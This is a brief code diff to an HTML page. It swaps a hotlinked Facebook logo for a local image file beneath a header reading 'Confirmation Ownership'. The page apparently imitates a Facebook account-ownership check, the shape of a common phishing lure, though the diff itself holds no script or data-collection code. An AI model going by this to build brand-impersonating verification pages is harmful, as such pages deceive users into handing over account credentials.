--- a/index.html
+++ b/index.html
@@ -108,7 +108,7 @@
 <body>
     <div class="container">
         <div class="logo">
-            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Logo">
+            <img class="logo" src="49ca810f-03d4-4035-9aa2-ed1342ab5fab new.jfif" alt="Logo">
         </div>
         <div class="header">
              Confirmation Ownership
